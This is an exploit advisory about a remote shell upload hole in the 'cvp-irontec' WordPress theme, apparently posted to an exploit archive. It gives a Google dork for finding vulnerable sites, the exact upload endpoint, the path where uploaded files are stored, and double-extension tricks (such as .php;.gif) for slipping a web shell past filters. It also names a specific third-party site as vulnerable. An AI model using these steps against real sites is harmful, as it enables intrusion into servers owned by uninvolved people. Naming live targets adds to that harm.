##################################################################### # Exploit Title : WordPress cvp-irontec Themes 4.8.3 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/12/2018 # Vendor Homepage : wordpress.org # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : V4.8.3 ~ Apache 2.4.10 ~ jQuery 1.8.3 ~ jQuery UI 1.8.18 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/themes/cvp-irontec/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434- [ Unrestricted Upload of File with Dangerous Type ] ##################################################################### # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/themes/cvp-irontec/_inc/din-upload/din-upload.php # Directory File Path : /wp-content/uploads/avatars/signups/avatar_[RANDOM-NUMBERS]-bpfull.jpeg # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg ##################################################################### # Example Vulnerable Site => [+] kronikoensarea.net/wp-content/themes/cvp-irontec/_inc/din-upload/din-upload.php ##################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #####################################################################